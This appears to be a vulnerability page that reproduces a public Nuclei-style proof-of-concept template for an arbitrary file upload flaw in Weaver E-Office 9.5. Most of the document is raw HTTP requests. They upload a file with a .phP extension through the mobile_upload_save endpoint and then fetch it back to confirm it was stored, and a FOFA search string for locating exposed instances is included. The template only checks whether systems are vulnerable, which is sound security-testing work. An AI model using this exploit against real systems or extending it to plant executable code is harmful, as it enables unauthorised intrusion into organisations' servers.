漏洞描述
Weaver E-Office version 9.5 is susceptible to an arbitrary file upload vulnerability. This flaw allows malicious actors to upload and execute arbitrary code or files without proper validation or authorization.
weaver-eoffice-file-upload: Weaver E-Office v9.5 - Arbitrary File Upload
PoC代码[已公开]
id: weaver-eoffice-file-upload
info:
name: Weaver E-Office v9.5 - Arbitrary File Upload
author: princechaddha
severity: high
description: |
Weaver E-Office version 9.5 is susceptible to an arbitrary file upload vulnerability. This flaw allows malicious actors to upload and execute arbitrary code or files without proper validation or authorization.
reference:
- https://github.com/RCEraser/cve/blob/main/Weaver.md
classification:
cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
fofa-query: app="泛微-EOffice"
product: e-office
vendor: weaver
tags: e-office,weaver,intrusive,file-upload,vuln
variables:
filename: '{{rand_base(7, "abc")}}'
http:
- raw:
- |
POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="{{filename}}.phP"
Content-Type: image/jpeg
{{randstr}}
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
- |
GET /attachment/{{id}}/{{filename}}.phP HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '{{randstr}}'
extractors:
- type: regex
name: id
part: body
group: 1
internal: true
regex:
- '\\\/attachment\\\/([0-9]+)\\\/'
# digest: 4b0a004830460221009ef29219119184c6625f5671a9a1a3cfddbae46c889340cdb23c1253a8f9424d022100846173b877cf0249757434a6d96bf07d2f6b366226babf4f8402ee84e682b4a3:922c64590222798bb761d5b6d8e72950